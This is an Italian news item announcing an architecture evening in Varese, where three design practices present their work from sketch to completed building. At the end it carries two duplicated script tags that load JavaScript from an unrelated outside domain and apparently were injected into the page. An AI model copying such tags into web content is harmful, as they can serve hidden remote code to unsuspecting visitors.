1. Home
  2. Notizie e Mercato
  3. Tre + Tre, dall’idea all’opera finale: la buona architettura vista attraverso le opere di tre progettisti

Tre + Tre, dall’idea all’opera finale: la buona architettura vista attraverso le opere di tre progettisti

Professione di
In programma stasera a Varese l’incontro che vedrà tre illustri progettisti raccontare i propri lavori, dal primo abbozzo fino alla realizzazione


Mercoledì 24 ottobre gli architetti riaccendono i riflettori sulla professione e sulle realizzazioni degli iscritti all’Ordine in una serata interamente dedicata ai progetti, presentati dagli stessi autori.

Paolo Bertolotti, Paolo Riva e Prr Architetti saranno infatti i relatori che si avvicenderanno nel racconto dei propri “lavori”. Attraverso un percorso fatto di immagini, emozioni e visioni condurranno i presenti attraverso i vari passaggi che hanno portato alla realizzazione dell’opera finale.

La serata, inserita nell’ambito degli eventi organizzati per festeggiare il 50° anniversario dell’Ordine varesino, ha l’obiettivo di fornire spunti di riflessione e stimoli per la professione ma anche di mostrare esempi pratici di architettura di qualità.

L’evento, a ingresso libero, è aperto a tutti e avrà inizio alle ore 20.30.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>